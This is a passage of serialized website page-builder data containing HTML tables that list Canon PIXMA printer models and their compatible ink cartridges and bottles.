(Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA 